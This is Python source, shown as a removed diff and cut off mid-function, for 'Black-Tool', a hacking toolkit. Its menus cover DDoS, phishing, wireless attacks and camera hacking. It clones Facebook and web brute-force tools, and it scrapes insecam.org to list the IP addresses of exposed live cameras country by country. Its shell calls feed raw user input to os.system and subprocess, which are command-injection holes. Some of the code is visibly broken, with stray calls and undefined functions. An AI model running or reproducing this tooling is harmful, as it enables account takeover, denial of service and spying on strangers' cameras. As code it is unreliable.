https://github.com/mrprogrammer2938 -# Instagram: https://instagram.com/programmer2938 -# ---------------------------------------------------------------- -# License -# MIT License - -# Copyright (c) 2021 Mr.programmer - -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: - -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. - -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -import os -import time -import re -import sys -import datetime -import platform -import requests -try: - from colorama import Fore,init -except ImportError: - os.system("pip3 install colorama"); -try: - import socket -except ImportError: - os.system("pip install socket"); -try: - import subprocess -except ImportError: - os.system("pip install subprocess"); -try: - import ipapi -except ImportError: - os.system("pip install ipapi"); -Black_Tool_Version = "\nBlack-Tool 1.5.0\n" -user = subprocess.getoutput("whoami") -black_Tool_date = subprocess.getoutput("date").replace("+0430","") -packet = "\nEnter packet: " -def check_internet_title(): - os.system("printf '\033]2;Black-Tool: Check-Internet\a'") -def check_internet_title_Connected(): - os.system("printf '\033]2;Black-Tool: Internet Connected!\a'") -# ------------- Black Tool Color --------------- -class color: - red = '\033[91m' - blue = '\033[96m' - End = '\033[0m' - green = '\033[92m' - darkblue = '\033[34m' - org = '\033[33m' - line = '\033[4m' - prlblue = '\033[94m' - white_light = '\033[97m' -# ---------------------------------------------- -Black_Tool_Search_Err = color.red + "Error, " + color.green + "Please Check URL!" + color.End -opt_shell = color.line + "Black-Tool" + color.End + "/ ~# " -def user_os_info(): - print("\n--------Black Tool----------\n") - print("User: " + user) - print("os: " + system) - print("----------------------------\n") - try34() -def user_os_info_ver(): - print("--------Black Tool----------\n") - print("User: " + user) - print("os: " + system) - print("----------------------------\n") -def user_search(): - if os.getuid() == 0: - check_internet() - else: - print("\nPlease, Run This Tool as Root!\n") - sys.exit() -def check_internet(host="https://google.com"): - try: - check_internet_title() - cls() - print("\nCheck Internet...\n") - try: - internet = requests.get(host,timeout=12) - if internet.status_code == 200: - try: - check_internet_title_Connected() - print("Internet Connected!") - time.sleep(1) - print("\nSet on System....") - time.sleep(1) - user_os_info() - except EOFError: - print("\nCtrl + D") - print("\nExiting...") - sys.exit() - else: - print("\nPlease, Check Internet!") - sys.exit() - except KeyboardInterrupt: - print("\nError: Failed To Start Black Tool!\n") - sys.exit() - except: - sys.exit() -opt = color.blue + "\nBlack-Tool~# " + color.End -Black_Tool_Shell_Help = """ -set | set [Option] -options | show options -Version | show Black Tool version -exit | exit Black Tool -quit | quit Black Tool -back | Back Black Tool Menu -help | Black Tool Shell Help -run | run Attack -exploit | run Attack -""" -Black_menu_mass = color.green + "Exiting..." + color.End -system = platform.uname()[0] -ip = "\nEnter ip: " -exm = "\nPlease, Enter Ip!" -packet_2 = "\nEnter packet: " -port = "\nEnter port: " -Black_Hack_version = "Black-Tool 1.4.0" -def title(): - os.system("printf '\033]2;Black-Tool\a'") -def cls(): - os.system("clear") -def ext(): - cls() - print(Black_menu_mass) - sys.exit() -def menu(): - try: - title() - cls() - screen() - black() - except KeyboardInterrupt: - print("\nCtrl + C") - print(color.green + "\nExiting..." + color.End) - sys.exit() -# Menu 1.5.0 -def black(): - print("\n{1}.Black-Tool Attack") - print("{2}.Black-Tool Shell") - print("{3}.Black-Tool Search") - print("{4}.Web-Hacking") - print("{5}.Cam-Hackers") - print("{6}.Phishing") - print("{7}.Wirless Attack") - print("{8}.Web-Info") - print("{9}.Soial-Enginner") - print("{10}.Hacking-Tools") - print("{11}.DDos-Attack") - print("{12}.Hacking With IpApi") - print("{13}.Hacking Camera Online") - print("{14}.Update & Uninstall") - print("{0}.Developer") - print("[C].Command") - print("{99}.Exit") - choose = input(opt) - if choose == '1': - Black_Tool_Start() - elif choose == '2': - Black_Tool_Shell() - elif choose == '3': - black_Tool_Search() - elif choose == '4': - black_webhacking() - elif choose == '5': - black_Cam_Hacking() - elif choose == '6': - black_Phishing() - elif choose == '7': - black_wirless_Attack() - elif choose == '8': - black_webinfo() - elif choose == '9': - black_soialenginners() - elif choose == '10': - black_Hackingtools() - elif choose == '11': - black_DDos_Attack() - elif choose == '12': - black_ipapi_hacking() - elif choose == '13': - black_camhack_online() - elif choose == '14': - black_Update_Uninstalling() - elif choose == '0': - black_tool_developer() - elif choose == 'c': - Black_Tool_Command() - elif choose == 'C': - Black_Tool_Command() - elif choose == '99': - ext() - elif choose == 'exit': - ext() - elif choose == 'quit': - ext() - elif choose == 'banner': - cls() - banner() - try25() - elif choose == 'cls': - black_2() - elif choose == 'clear': - black_2() - elif choose == 'back': - menu() - elif choose == '': - menu() - elif choose == ' ': - menu() - elif choose == ' ': - menu() - else: - cls() - print(choose + color.red + " Not Found!" + color.End) - try_to_black_Tool = input("\npress Enter...") - if try_to_black_Tool == '': - menu() - else: - menu() -def black_2(): - cls() - print("\n{1}.Black-Tool Attack") - print("{2}.Black-Tool Shell") - print("{3}.Black-Tool Search") - print("{4}.Web-Hacking") - print("{5}.Cam-Hackers") - print("{6}.Phishing") - print("{7}.Wirless Attack") - print("{8}.Web-Info") - print("{9}.Soial-Enginner") - print("{10}.Hacking-Tools") - print("{11}.DDos-Attack") - print("{12}.Hacking With IpApi") - print("{13}.Update & Uninstall") - print("{0}.Developer") - print("[C].Command") - print("{99}.Exit") - choose = input(opt) - if choose == '1': - Black_Tool_Start_2() - elif choose == '2': - Black_Tool_Shell_2() - elif choose == '3': - black_Tool_Search_2() - elif choose == '4': - black_webhacking_2() - elif choose == '5': - black_Cam_Hacking_2() - elif choose == '6': - black_Phishing_2() - elif choose == '7': - black_wirless_Attack_2() - elif choose == '8': - black_webinfo_2() - elif choose == '9': - black_soialenginners_2() - elif choose == '10': - black_Hackingtools_2() - elif choose == '11': - black_DDos_Attack_2() - elif choose == '12': - black_ipapi_hacking_2() - elif choose == '13': - black_camhack_online_2() - elif choose == '14': - black_Update_Uninstalling_2() - elif choose == '0': - black_tool_developer_2() - elif choose == 'c': - Black_Tool_Command_2() - elif choose == 'C': - Black_Tool_Command_2() - elif choose == '99': - ext() - elif choose == 'exit': - ext() - elif choose == 'quit': - ext() - elif choose == 'banner': - cls() - banner() - try36() - elif choose == 'cls': - black_2() - elif choose == 'clear': - black_2() - elif choose == 'back': - menu() - else: - black_2() -def try34(): - try_to_start_Black_Tool = input("\npress Enter To Start " + color.green + "Black-Tool" + color.End + "...") - if try_to_start_Black_Tool == '': - menu() - else: - menu() -def try_to_black_menu(): - try2 = input("\npress Enter...") - if try2 == '': - menu() - else: - menu() -def Black_Tool_Start(): - os.system("figlet Black Tool|lolcat") - print("\n{1}.Portscan") - print("{2}.DDos-Attack") - print("{3}.Ping Test") - print("{4}.Web Loction") - print("{5}.WhoIs lookup") - print("{6}.nslookup") - print("{7}.Ip Search") - print("{8}.40") - print("{99}.mein menu") - choose_black = input(opt) - if choose_black == '1': - black_portscan() - elif choose_black == '2': - black_ddosattack() - elif choose_black == '3': - black_ping() - elif choose_black == '4': - black_weblocation() - elif choose_black == '5': - black_whois_lookup() - elif choose_black == '6': - black_nslookup() - elif choose_black == '7': - black_ip_search() - elif choose_black == '8': - black_installing_40_tool() - elif choose_black == '99': - menu() - else: - Black_Tool_Start() -def Black_Tool_Start_2(): - os.system("figlet Black Tool|lolcat") - print("\n{1}.Portscan") - print("{2}.DDos-Attack") - print("{3}.Ping Test") - print("{4}.Web Loction") - print("{5}.WhoIs lookup") - print("{6}.nslookup") - print("{7}.Ip Search") - print("{8}.40") - print("{99}.mein menu") - choose_black = input(opt) - if choose_black == '1': - black_portscan() - elif choose_black == '2': - black_ddosattack() - elif choose_black == '3': - black_ping() - elif choose_black == '4': - black_weblocation() - elif choose_black == '5': - black_whois_lookup() - elif choose_black == '6': - black_nslookup() - elif choose_black == '7': - black_ip_search() - elif choose_black == '8': - black_installing_40_tool() - elif choose_black == '99': - black_2() - else: - Black_Tool_Start_2() -def screen(): - print(color.green + """ - ███████████ ████ █████ ███████████ ████ - ░░███░░░░░███░░███ ░░███ ░█░░░███░░░█ ░░███ - ░███ ░███ ░███ ██████ ██████ ░███ █████ ░ ░███ ░ ██████ ██████ ░███ """ + color.red + "Version: " + color.blue + "1.5.0" + color.green + """ - ░██████████ ░███ ░░░░░███ ███░░███ ░███░░███ ░███ ███░░███ ███░░███ ░███ - ░███░░░░░███ ░███ ███████ ░███ ░░░ ░██████░ ░███ ░███ ░███░███ ░███ ░███ - ░███ ░███ ░███ ███░░███ ░███ ███ ░███░░███ ░███ ░███ ░███░███ ░███ ░███ - ███████████ █████░░████████░░██████ ████ █████ █████ ░░██████ ░░██████ █████ - ░░░░░░░░░░░ ░░░░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░ \n""" + color.org + """ - ---[This code write by """ + color.End + color.line + "Mr.nope" + color.End + color.org + " ]----" + color.End + """ - - Start Black-Tool at: """ + black_Tool_date + "\n") -def black_webhacking(): - cls() - print(color.blue) - os.system("figlet Web Hacking") - print("\n{1}.brute-Force") - print("{2}.bruteX") - print("{3}.Brute-Boom") - print("{4}.Bruter") - print("{5}.FaceBook-Bruteforce") - print("{99}.mein menu") - choose2 = input(opt) - if choose2 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938/Brute-Force") - try18() - elif choose2 == '2': - cls() - os.system("git clone https://github.com/1N3/BruteX") - try18() - elif choose2 == '3': - cls() - os.system("git clone https://github.com/Oseid/FaceBoom") - try18() - elif choose2 == '4': - cls() - os.system("git clone https://github.com/AzizKpln/Bruter19") - try18() - elif choose2 == '5': - cls() - os.system("git clone https://github.com/IAmBlackHacker/Facebook-BruteForce") - try18() - elif choose2 == '99': - menu() - else: - black_webhacking() -def try36(): - try_to_Black_Tool_menu_7 = input("\npress Enter...") - if try_to_Black_Tool_menu_7 == '': - black_2() - else: - black_2() -def black_camhack_online(): - cls() - banner() - print("""\n -\033[1;32m1) \033[1;37mUnited States \033[1;32m32) \033[1;37mMexico \033[1;32m61) \033[1;37mMoldova -\033[1;32m2) \033[1;37mJapan \033[1;32m32) \033[1;37mFinland \033[1;32m62) \033[1;37mNicaragua -\033[1;32m3) \033[1;37mItaly \033[1;32m33) \033[1;37mChina \033[1;32m63) \033[1;37mMalta -\033[1;32m4) \033[1;37mKorea \033[1;32m34) \033[1;37mChile \033[1;32m64) \033[1;37mTrinidad And Tobago -\033[1;32m5) \033[1;37mFrance \033[1;32m35) \033[1;37mSouth Africa \033[1;32m65) \033[1;37mSoudi Arabia -\033[1;32m6) \033[1;37mGermany \033[1;32m36) \033[1;37mSlovakia \033[1;32m66) \033[1;37mCroatia -\033[1;32m7) \033[1;37mTaiwan \033[1;32m37) \033[1;37mHungary \033[1;32m67) \033[1;37mCyprus -\033[1;32m8) \033[1;37mRussian Federation \033[1;32m38) \033[1;37mIreland \033[1;32m68) \033[1;37mPakistan -\033[1;32m9) \033[1;37mUnited Kingdom \033[1;32m39) \033[1;37mEgypt \033[1;32m69) \033[1;37mUnited Arab Emirates -\033[1;32m10) \033[1;37mNetherlands \033[1;32m40) \033[1;37mThailand \033[1;32m70) \033[1;37mKazakhstan -\033[1;32m11) \033[1;37mCzech Republic \033[1;32m41) \033[1;37mUkraine \033[1;32m71) \033[1;37mKuwait -\033[1;32m12) \033[1;37mTurkey \033[1;32m42) \033[1;37mSerbia \033[1;32m72) \033[1;37mVenezuela -\033[1;32m13) \033[1;37mAustria \033[1;32m43) \033[1;37mHong Kong \033[1;32m73) \033[1;37mGeorgia -\033[1;32m14) \033[1;37mSwitzerland \033[1;32m44) \033[1;37mGreece \033[1;32m74) \033[1;37mMontenegro -\033[1;32m15) \033[1;37mSpain \033[1;32m45) \033[1;37mPortugal \033[1;32m75) \033[1;37mEl Salvador -\033[1;32m16) \033[1;37mCanada \033[1;32m46) \033[1;37mLatvia \033[1;32m76) \033[1;37mLuxembourg -\033[1;32m17) \033[1;37mSweden \033[1;32m47) \033[1;37mSingapore \033[1;32m77) \033[1;37mCuracao -\033[1;32m18) \033[1;37mIsrael \033[1;32m48) \033[1;37mIceland \033[1;32m78) \033[1;37mPuerto Rico -\033[1;32m19) \033[1;37mIran \033[1;32m49) \033[1;37mMalaysia \033[1;32m79) \033[1;37mCosta Rica -\033[1;32m20) \033[1;37mPoland \033[1;32m50) \033[1;37mColombia \033[1;32m80) \033[1;37mBelarus -\033[1;32m21) \033[1;37mIndia \033[1;32m51) \033[1;37mTunisia \033[1;32m81) \033[1;37mAlbania -\033[1;32m22) \033[1;37mNorway \033[1;32m52) \033[1;37mEstonia \033[1;32m82) \033[1;37mLiechtenstein -\033[1;32m23) \033[1;37mRomania \033[1;32m53) \033[1;37mDominican Republic \033[1;32m83) \033[1;37mBosnia And Herzegovia -\033[1;32m24) \033[1;37mViet Nam \033[1;32m54) \033[1;37mSloveania \033[1;32m84) \033[1;37mParaguay -\033[1;32m25) \033[1;37mBelgium \033[1;32m55) \033[1;37mEcuador \033[1;32m85) \033[1;37mPhilippines -\033[1;32m26) \033[1;37mBrazil \033[1;32m56) \033[1;37mLithuania \033[1;32m86) \033[1;37mFaroe Islands -\033[1;32m27) \033[1;37mBulgaria \033[1;32m57) \033[1;37mPalestinian \033[1;32m87) \033[1;37mGuatemala -\033[1;32m28) \033[1;37mIndonesia \033[1;32m58) \033[1;37mNew Zealand \033[1;32m88) \033[1;37mNepal -\033[1;32m29) \033[1;37mDenmark \033[1;32m59) \033[1;37mBangladeh \033[1;32m89) \033[1;37mPeru -\033[1;32m30) \033[1;37mArgentina \033[1;32m60) \033[1;37mPanama \033[1;32m90) \033[1;37mUruguay - \033[1;32m91) \033[1;37mExtra""") - countries = ["US", "JP", "IT", "KR", "FR", "DE", "TW", "RU", "GB", "NL", - "CZ", "TR", "AT", "CH", "ES", "CA", "SE", "IL", "PL", "IR", - "NO", "RO", "IN", "VN", "BE", "BR", "BG", "ID", "DK", "AR", - "MX", "FI", "CN", "CL", "ZA", "SK", "HU", "IE", "EG", "TH", - "UA", "RS", "HK", "GR", "PT", "LV", "SG", "IS", "MY", "CO", - "TN", "EE", "DO", "SI", "EC", "LT", "PS", "NZ", "BD", "PA", - "MD", "NI", "MT", "IT", "SA", "HR", "CY", "PK", "AE", "KZ", - "KW", "VE", "GE", "ME", "SV", "LU", "CW", "PR", "CR", "BY", - "AL", "LI", "BA", "PY", "PH", "FO", "GT", "NP", "PE", "UY", - "-"] - try: - num = int(input("Enter Country: ")) - if num not in range(1, 91+1): - raise IndexError - country = countries[num-1] - headers = {"User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0"} - res = requests.get(f"https://www.insecam.org/en/bycountry/{country}", headers=headers) - last_page = re.findall(r'pagenavigator\("\?page=", (\d+)', res.text)[0] - for page in range(int(last_page)): - res = requests.get( - f"https://www.insecam.org/en/bycountry/{country}/?page={page}", - headers=headers - ) - ip_search = re.findall(r"http://\d+.\d+.\d+.\d+:\d+", res.text) - for camhack_ip in ip_search: - print(color.green, camhack_ip) - print(res) - try48() - except KeyboardInterrupt: - print("\nCtrl + C") - try51() -def black_camhack_online_2(): - cls() - banner() - print("""\n -\033[1;32m1) \033[1;37mUnited States \033[1;32m32) \033[1;37mMexico \033[1;32m61) \033[1;37mMoldova -\033[1;32m2) \033[1;37mJapan \033[1;32m32) \033[1;37mFinland \033[1;32m62) \033[1;37mNicaragua -\033[1;32m3) \033[1;37mItaly \033[1;32m33) \033[1;37mChina \033[1;32m63) \033[1;37mMalta -\033[1;32m4) \033[1;37mKorea \033[1;32m34) \033[1;37mChile \033[1;32m64) \033[1;37mTrinidad And Tobago -\033[1;32m5) \033[1;37mFrance \033[1;32m35) \033[1;37mSouth Africa \033[1;32m65) \033[1;37mSoudi Arabia -\033[1;32m6) \033[1;37mGermany \033[1;32m36) \033[1;37mSlovakia \033[1;32m66) \033[1;37mCroatia -\033[1;32m7) \033[1;37mTaiwan \033[1;32m37) \033[1;37mHungary \033[1;32m67) \033[1;37mCyprus -\033[1;32m8) \033[1;37mRussian Federation \033[1;32m38) \033[1;37mIreland \033[1;32m68) \033[1;37mPakistan -\033[1;32m9) \033[1;37mUnited Kingdom \033[1;32m39) \033[1;37mEgypt \033[1;32m69) \033[1;37mUnited Arab Emirates -\033[1;32m10) \033[1;37mNetherlands \033[1;32m40) \033[1;37mThailand \033[1;32m70) \033[1;37mKazakhstan -\033[1;32m11) \033[1;37mCzech Republic \033[1;32m41) \033[1;37mUkraine \033[1;32m71) \033[1;37mKuwait -\033[1;32m12) \033[1;37mTurkey \033[1;32m42) \033[1;37mSerbia \033[1;32m72) \033[1;37mVenezuela -\033[1;32m13) \033[1;37mAustria \033[1;32m43) \033[1;37mHong Kong \033[1;32m73) \033[1;37mGeorgia -\033[1;32m14) \033[1;37mSwitzerland \033[1;32m44) \033[1;37mGreece \033[1;32m74) \033[1;37mMontenegro -\033[1;32m15) \033[1;37mSpain \033[1;32m45) \033[1;37mPortugal \033[1;32m75) \033[1;37mEl Salvador -\033[1;32m16) \033[1;37mCanada \033[1;32m46) \033[1;37mLatvia \033[1;32m76) \033[1;37mLuxembourg -\033[1;32m17) \033[1;37mSweden \033[1;32m47) \033[1;37mSingapore \033[1;32m77) \033[1;37mCuracao -\033[1;32m18) \033[1;37mIsrael \033[1;32m48) \033[1;37mIceland \033[1;32m78) \033[1;37mPuerto Rico -\033[1;32m19) \033[1;37mIran \033[1;32m49) \033[1;37mMalaysia \033[1;32m79) \033[1;37mCosta Rica -\033[1;32m20) \033[1;37mPoland \033[1;32m50) \033[1;37mColombia \033[1;32m80) \033[1;37mBelarus -\033[1;32m21) \033[1;37mIndia \033[1;32m51) \033[1;37mTunisia \033[1;32m81) \033[1;37mAlbania -\033[1;32m22) \033[1;37mNorway \033[1;32m52) \033[1;37mEstonia \033[1;32m82) \033[1;37mLiechtenstein -\033[1;32m23) \033[1;37mRomania \033[1;32m53) \033[1;37mDominican Republic \033[1;32m83) \033[1;37mBosnia And Herzegovia -\033[1;32m24) \033[1;37mViet Nam \033[1;32m54) \033[1;37mSloveania \033[1;32m84) \033[1;37mParaguay -\033[1;32m25) \033[1;37mBelgium \033[1;32m55) \033[1;37mEcuador \033[1;32m85) \033[1;37mPhilippines -\033[1;32m26) \033[1;37mBrazil \033[1;32m56) \033[1;37mLithuania \033[1;32m86) \033[1;37mFaroe Islands -\033[1;32m27) \033[1;37mBulgaria \033[1;32m57) \033[1;37mPalestinian \033[1;32m87) \033[1;37mGuatemala -\033[1;32m28) \033[1;37mIndonesia \033[1;32m58) \033[1;37mNew Zealand \033[1;32m88) \033[1;37mNepal -\033[1;32m29) \033[1;37mDenmark \033[1;32m59) \033[1;37mBangladeh \033[1;32m89) \033[1;37mPeru -\033[1;32m30) \033[1;37mArgentina \033[1;32m60) \033[1;37mPanama \033[1;32m90) \033[1;37mUruguay - \033[1;32m91) \033[1;37mExtra""") - countries = ["US", "JP", "IT", "KR", "FR", "DE", "TW", "RU", "GB", "NL", - "CZ", "TR", "AT", "CH", "ES", "CA", "SE", "IL", "PL", "IR", - "NO", "RO", "IN", "VN", "BE", "BR", "BG", "ID", "DK", "AR", - "MX", "FI", "CN", "CL", "ZA", "SK", "HU", "IE", "EG", "TH", - "UA", "RS", "HK", "GR", "PT", "LV", "SG", "IS", "MY", "CO", - "TN", "EE", "DO", "SI", "EC", "LT", "PS", "NZ", "BD", "PA", - "MD", "NI", "MT", "IT", "SA", "HR", "CY", "PK", "AE", "KZ", - "KW", "VE", "GE", "ME", "SV", "LU", "CW", "PR", "CR", "BY", - "AL", "LI", "BA", "PY", "PH", "FO", "GT", "NP", "PE", "UY", - "-"] - try: - num = int(input("Enter Country: ")) - if num not in range(1, 91+1): - raise IndexError - country = countries[num-1] - headers = {"User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0"} - res = requests.get(f"https://www.insecam.org/en/bycountry/{country}", headers=headers) - last_page = re.findall(r'pagenavigator\("\?page=", (\d+)', res.text)[0] - for page in range(int(last_page)): - res = requests.get( - f"https://www.insecam.org/en/bycountry/{country}/?page={page}", - headers=headers - ) - ip_search = re.findall(r"http://\d+.\d+.\d+.\d+:\d+", res.text) - for camhack_ip in ip_search: - print(color.green, camhack_ip) - print(res) - try48() - except KeyboardInterrupt: - print("\nCtrl + C") - try53() -def black_webhacking_2(): - cls() - print(color.blue) - os.system("figlet Web Hacking") - print("\n{1}.brute-Force") - print("{2}.bruteX") - print("{3}.Brute-Boom") - print("{4}.Bruter") - print("{5}.FaceBook-Bruteforce") - print("{99}.mein menu") - choose2 = input(opt) - if choose2 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938/Brute-Force") - try18() - elif choose2 == '2': - cls() - os.system("git clone https://github.com/1N3/BruteX") - try18() - elif choose2 == '3': - cls() - os.system("git clone https://github.com/Oseid/FaceBoom") - try18() - elif choose2 == '4': - cls() - os.system("git clone https://github.com/AzizKpln/Bruter19") - try18() - elif choose2 == '5': - cls() - os.system("git clone https://github.com/IAmBlackHacker/Facebook-BruteForce") - try18() - elif choose2 == '99': - black_2() - else: - black_webhacking_2() -def try51(): - try_to_Hacking_Camera = input("\nDo you want to try again? [y/n] ") - if try_to_Hacking_Camera == 'y': - black_camhack_online() - elif try_to_Hacking_Camera == 'n': - try52() - else: - try51() -def black_ipapi_hacking(): - cls() - os.system("figlet -f slant Hacking|lolcat") - print("\n{1}.Port Scan") - print("{2}.Ping Test") - print("{3}.Whois") - print("{4}.Internet test") - print("{5}.Geoip") - print("{99}.mein menu") - choose_ipapi = input(opt) - if choose_ipapi == '1': - black_tool_ipapi_portscan() - elif choose_ipapi == '2': - black_tool_ipapi_pingtest() - elif choose_ipapi == '3': - black_tool_ipapi_whois() - elif choose_ipapi == '4': - black_tool_ipapi_internet_test() - elif choose_ipapi == '5': - black_tool_ipapi_geoip() - elif choose_ipapi == '99': - menu() - else: - black_ipapi_hacking() -def try48(): - try_to_Black_Hacking_Camera_Online = input("\nDo you want tor try again? [y/n] ") - if try_to_Black_Hacking_Camera_Online == 'y': - black_camhack_online() - elif try_to_Black_Hacking_Camera_Online == 'n': - try49() - else: - try48() -def try49(): - try_to_Black_menu_4 = input("\npress Enter...") - if try_to_Black_menu_4 == '': - menu() - else: - menu() -def black_ipapi_hacking_2(): - cls() - os.system("figlet -f slant Hacking|lolcat") - print("\n{1}.Port Scan") - print("{2}.Ping Test") - print("{3}.Whois") - print("{4}.Internet test") - print("{5}.Geoip") - print("{99}.mein menu") - choose_ipapi = input(opt) - if choose_ipapi == '1': - black_tool_ipapi_portscan_2() - elif choose_ipapi == '2': - black_tool_ipapi_pingtest_2() - elif choose_ipapi == '3': - black_tool_ipapi_whois_2() - elif choose_ipapi == '4': - black_tool_ipapi_internet_test_2() - elif choose_ipapi == '5': - black_tool_ipapi_geoip_2() - elif choose_ipapi == '99': - black_2() - else: - black_ipapi_hacking_2() -def try52(): - try_to_Black_Tool_menu_4 = input("\npress Enter...") - if try_to_Black_Tool_menu_4 == '': - menu() - else: - menu() -def black_tool_ipapi_portscan(): - cls() - host_ipapi = input(ip) - start_ipapi_portscan = requests.get("https://api.hackertarget.com/nmap/?q=" + host_ipapi).text - print(start_ipapi_portscan) - try37() -def black_tool_ipapi_portscan_2(): - cls() - host_ipapi = input(ip) - start_ipapi_portscan = requests.get("https://api.hackertarget.com/nmap/?q=" + host_ipapi).text - print(start_ipapi_portscan) - try42() -def try37(): - try_to_ipapi_portscan = input("\nDo you want to try again? [y/n] ") - if try_to_ipapi_portscan == 'y': - black_tool_ipapi_portscan() - elif try_to_ipapi_portscan == 'n': - try38() - else: - try37() -def try42(): - try_to_ipapi_portscan_2 = input("\nDo you want to try again? [y/n] ") - if try_to_ipapi_portscan_2 == 'y': - black_tool_ipapi_portscan_2() - elif try_to_ipapi_portscan_2 == 'n': - try39() - else: - try42() -def try38(): - try_to_black_tool_ipapi_menu = input("\npress Enter...") - if try_to_black_tool_ipapi_menu == '': - black_ipapi_hacking() - else: - black_ipapi_hacking() -def try39(): - try_to_black_tool_ipapi_menu_2 = input("\npress Enter...") - if try_to_black_tool_ipapi_menu_2 == '': - black_ipapi_hacking_2() - else: - black_ipapi_hacking_2() -def black_tool_ipapi_pingtest(): - cls() - host_ipapi_2 = input(ip) - packet_ipapi = input(packet) - start_pingtest_2 = subprocess.getoutput(f"ping -w {packet_ipapi} {host_ipapi_2}") - print(start_pingtest_2) - try40() -def try53(): - try_to_CamHack_2 = input("\nDo you want to try again? [y/n] ") - if try_to_CamHack_2 == 'y': - black_Cam_Hacking_2() - elif try_to_CamHack_2 == 'n': - try54() - else: - try53() -def black_tool_ipapi_pingtest_2(): - cls() - host_ipapi_2 = input(ip) - packet_ipapi = input(packet) - start_pingtest_2 = subprocess.getoutput(f"ping -w {packet_ipapi} {host_ipapi_2}") - print(start_pingtest_2) - try43() -def try43(): - try_to_Black_Tool_pingtest_2 = input("\nDo you want to try again? [y/n] ") - if try_to_Black_Tool_pingtest_2 == 'y': - black_tool_ipapi_pingtest_2() - elif try_to_Black_Tool_pingtest_2 == 'n': - try39() - else: - try43() -def try40(): - try_to_black_tool_ipapi_pingtest = input("\nDo you want to try again? [y/n] ") - if try_to_black_tool_ipapi_pingtest == 'y': - black_tool_ipapi_pingtest() - elif try_to_black_tool_ipapi_pingtest == 'n': - try38() - else: - try40() -def black_tool_ipapi_whois(): - cls() - host_ipapi_3 = input(ip) - time.sleep(1) - start_whois_attack = requests.get("http://api.hackertarget.com/whois/?q=" + host_ipapi_3).text - print(start_whois_attack) - try45() -def try45(): - try_to_Black_Tool_whois = input("\nDo you want to try again? [y/n] ") - if try_to_Black_Tool_whois == 'y': - black_tool_ipapi_whois() - elif try_to_Black_Tool_whois == 'n': - try38() - else: - try45() -def try54(): - try_to_Black_menu_4 = input("\npress Enter...") - if try_to_Black_menu_4 == '': - black_2() - else: - black_2() -def black_tool_ipapi_whois_2(): - cls() - host_ipapi_3 = input(ip) - time.sleep(1) - start_whois_attack = requests.get("http://api.hackertarget.com/whois/?q=" + host_ipapi_3).text - print(start_whois_attack) - try46() -def try46(): - try_to_Black_Tool_whois_2 = input("\nDo you want to try again? [y/n] ") - if try_to_Black_Tool_whois_2 == 'y': - black_tool_ipapi_whois_2() - elif black_tool_ipapi_whois_2 == 'n': - 39() - else: - try46() -def black_tool_ipapi_internet_test(): - cls() - test_internet = requests.get("https://google.com") - if test_internet.status_code == 200: - print("Internet Connected!") - else: - print("Internet Disconnect!\nPlease, Check Internet!") - try38() -def black_tool_ipapi_internet_test_2(): - cls() - test_internet = requests.get("https://google.com") - if test_internet.status_code == 200: - print("Internet Connected!") - else: - print("Internet Disconnect!\nPlease, Check Internet!") - try39() -def black_tool_ipapi_geoip(): - cls() - host_ipapi_4 = input(ip) - time.sleep(1) - search_location = ipapi.location(ip=host_ipapi_4, key=None) - print("\n-----------------------------------") - print(color.red + "[~] " + color.green + "Ip: " + color.End + search_location["ip"]) - print(color.red + "[~] " + color.green + "region: " + color.End + search_location["region"]) - print(color.red + "[~] " + color.green + "org: " + color.End + search_location["org"]) - print(color.red + "[~] " + color.green + "City: " + color.End + search_location["city"]) - try41() -def black_tool_ipapi_geoip_2(): - cls() - host_ipapi_4 = input(ip) - time.sleep(1) - search_location = ipapi.location(ip=host_ipapi_4, key=None) - print("\n-----------------------------------") - print(color.red + "[~] " + color.green + "Ip: " + color.End + search_location["ip"]) - print(color.red + "[~] " + color.green + "region: " + color.End + search_location["region"]) - print(color.red + "[~] " + color.green + "org: " + color.End + search_location["org"]) - print(color.red + "[~] " + color.green + "City: " + color.End + search_location["city"]) - try47() -def try47(): - try_to_Black_Tool_getip_2 = input("\nDo you want to try again? [y/n] ") - if try_to_Black_Tool_getip_2 == 'y': - black_tool_ipapi_geoip_2() - elif try_to_Black_Tool_getip_2 == 'n': - try39() - else: - try47() -def try41(): - try_to_black_Tool_ipapi_location = input("\nDo you want to try again? [y/n] ") - if try_to_black_Tool_ipapi_location == 'y': - black_tool_ipapi_getip() - elif try_to_black_Tool_ipapi_location == 'n': - try38() - else: - try41() -def black_nslookup(): - cls() - host8 = input(ip) - attack_nslookup = subprocess.getoutput("nslookup " + host8) - print(attack_nslookup) - try11() -def arg(): - if sys.argv[1] == '--clone': - print(color.green + "Stating Cloning..." + color.End) - os.system("git clone " + sys.argv[2]) - print("Exiting...") - sys.exit() - elif sys.argv[1] == '--version': - print(Black_Hack_version) - print("\n") - user_os_info_ver() - sys.exit() - elif sys.argv[1] == '--start': - user_search() - elif sys.argv[1] == '--install': - print(color.green + "Starting Downloading..." + color.End) - os.system("sudo apt install " + sys.argv[2]) - print("Exiting...") - sys.exit() - elif sys.argv[1] == '--help': - black_tool_help() - else: - print("\nPlease, Check Argument!\n") - sys.exit() -def black_installing_40_tool(): - cls() - os.system("figlet -f slant 40|lolcat") - print("\n") - os.system("git clone https://github.com/mrprogrammer2938/40") - print("\nComplete!") - try15() -def black_Tool_Search(): - cls() - banner() - choose = input(""" 